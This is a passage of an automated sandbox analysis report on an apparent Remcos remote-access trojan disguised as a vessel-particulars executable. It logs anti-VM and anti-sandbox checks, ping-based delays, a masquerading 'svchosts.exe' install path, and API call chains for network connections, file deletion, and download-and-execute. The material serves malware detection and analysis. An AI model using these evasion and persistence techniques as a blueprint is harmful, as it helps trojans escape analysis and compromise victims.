          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 4300, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 2420, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MV OLYMPIC PROGRESS VSL PARTICULARS.exe PID: 2584, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 6932, type: MEMORY
          Contains functionality to detect virtual machines (IN, VMware)Show sources
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00401102 in eax, dx17_2_00401102
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.388425515.000000000300A000.00000004.00000001.sdmp, svchosts.exe, 00000017.00000002.407136269.0000000002EAA000.00000004.00000001.sdmp, svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmpBinary or memory string: JSBIEDLL.DLL
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, svchosts.exe, 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, svchosts.exe, 00000017.00000002.407136269.0000000002EAA000.00000004.00000001.sdmp, svchosts.exe, 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, svchosts.exe, 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Uses ping.exe to sleepShow sources
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2 Jump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe TID: 5536Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe TID: 5632Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 2336Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 6600Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 1256Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 1180Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 2920Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 6616Thread sleep count: 241 > 30Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 6616Thread sleep time: -2410000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040374A GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040376Fh17_2_0040374A
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040374A GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040376Fh17_2_0040374A
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00402C45 _EH_prolog,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hs17_2_00402C45
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040BC9B ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,17_2_0040BC9B
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00403183 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$all17_2_00403183
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040F234 SetFileAttributesA,FindFirstFileA,FindNextFileA,RemoveDirectoryA,SetFileAttributesA,DeleteFileA,GetLastError,FindClose,RemoveDirectoryA,FindClose,17_2_0040F234
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00405AFB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_00405AFB
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c17_2_0040A71E
